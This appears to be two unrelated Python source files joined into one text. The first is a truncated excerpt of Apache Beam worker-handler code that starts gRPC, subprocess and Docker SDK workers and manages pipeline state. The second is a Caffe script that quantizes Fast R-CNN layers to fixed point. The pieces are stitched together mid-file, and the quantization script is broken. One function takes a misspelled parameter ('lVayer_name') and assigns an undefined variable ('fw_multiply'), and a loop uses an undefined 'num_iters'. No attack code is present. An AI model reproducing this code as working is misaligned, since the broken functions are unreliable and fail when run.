# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
# type: () -> None
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
# type: (int) -> str
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
# type: () -> str
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
_LOGGER.info("Requesting worker at %s", self._external_payload.endpoint.url)
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# type: () -> str
# TODO(BEAM-8646): Reconcile across platforms.
if sys.platform in ['win32', 'darwin']:
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line,
self.control_address,
self.provision_info,
self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
# type: () -> str
if sys.platform == 'darwin':
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
if sys.platform == 'linux' and is_in_notebook():
import socket
# Gets ipv4 address of current host. Note the host is not guaranteed to
# be localhost because the python SDK could be running within a container.
return socket.gethostbyname(socket.getfqdn())
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
_LOGGER.info('Attempting to pull image %s', self._container_image)
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info(
'Unable to pull image %s, defaulting to local image if it exists' %
self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
_LOGGER.info(
'Waiting for docker to start up. Current status is %s' %
status.decode('utf-8'))
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError(
'SDK failed to start. Final status is %s' %
status.decode('utf-8'))
time.sleep(1)
self._done = False
t = threading.Thread(target=self.watch_container)
t.daemon = True
t.start()
def watch_container(self):
# type: () -> None
while not self._done:
assert self._container_id is not None
status = subprocess.check_output(
['docker', 'inspect', '-f', '{{.State.Status}}',
self._container_id]).strip()
if status != b'running':
if not self._done:
logs = subprocess.check_output([
'docker', 'container', 'logs', '--tail', '10', self._container_id
],
stderr=subprocess.STDOUT)
_LOGGER.info(logs)
self.control_conn.abort(
RuntimeError(
'SDK exited unexpectedly. '
'Final status is %s. Final log line is %s' % (
status.decode('utf-8'),
logs.decode('utf-8').strip().split('\n')[-1])))
time.sleep(5)
def stop_worker(self):
# type: () -> None
self._done = True
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: ExtendedProvisionInfo
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._workers_by_id = {} # type: Dict[str, WorkerHandler]
self.state_servicer = StateServicer()
self._grpc_server = None # type: Optional[GrpcServer]
self._process_bundle_descriptors = {
} # type: Dict[str, beam_fn_api_pb2.ProcessBundleDescriptor]
def register_process_bundle_descriptor(self, process_bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
self._process_bundle_descriptors[
process_bundle_descriptor.id] = process_bundle_descriptor
def get_process_bundle_descriptor(self, request):
# type: (beam_fn_api_pb2.GetProcessBundleDescriptorRequest) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._process_bundle_descriptors[
request.process_bundle_descriptor_id]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
# special case for EmbeddedWorkerHandler: there's no need for a gRPC
# server, but we need to pass self instead. Cast to make the type check
# on WorkerHandler.create() think we have a GrpcServer instance.
grpc_server = cast(GrpcServer, self)
elif self._grpc_server is None:
self._grpc_server = GrpcServer(
self.state_servicer, self._job_provision_info, self)
grpc_server = self._grpc_server
else:
grpc_server = self._grpc_server
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self.state_servicer,
self._job_provision_info.for_environment(environment),
grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s (%s, %r)",
worker_handler,
environment_id,
environment.urn,
environment.payload)
self._cached_handlers[environment_id].append(worker_handler)
self._workers_by_id[worker_handler.worker_id] = worker_handler
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
# type: () -> None
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
"Error closing worker_handler %s" % worker_handler, exc_info=True)
self._cached_handlers = {} # type: ignore[assignment]
self._workers_by_id = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
def get_worker(self, worker_id):
# type: (str) -> WorkerHandler
return self._workers_by_id[worker_id]
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(list) # type: StateServicer.StateType
self._checkpoint = None # type: Optional[StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = StateServicer.CopyOnWriteState(self._state)
def commit(self):
# type: () -> None
assert isinstance(self._state,
StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
# type: (Any) -> Iterator
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
def done(self):
# type: () -> None
pass
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None # type: Any
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
class ControlFuture(object):
def __init__(self,
instruction_id, # type: str
response=None # type: Optional[beam_fn_api_pb2.InstructionResponse]
):
# type: (...) -> None
self.instruction_id = instruction_id
self._response = response
if response is None:
self._condition = threading.Condition()
self._exception = None # type: Optional[Exception]
def is_done(self):
# type: () -> bool
return self._response is not None
def set(self, response):
# type: (beam_fn_api_pb2.InstructionResponse) -> None
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
# type: (Optional[float]) -> beam_fn_api_pb2.InstructionResponse
if not self._response and not self._exception:
with self._condition:
if not self._response and not self._exception:
self._condition.wait(timeout)
if self._exception:
raise self._exception
else:
assert self._response is not None
return self._response
def abort(self, exception):
# type: (Exception) -> None
with self._condition:
self._exception = exception
self._condition.notify_all()
|
quantize_ssd_w6a32.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, lVayer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
l.quantization_param.fl_multiply = fw_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0.015
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
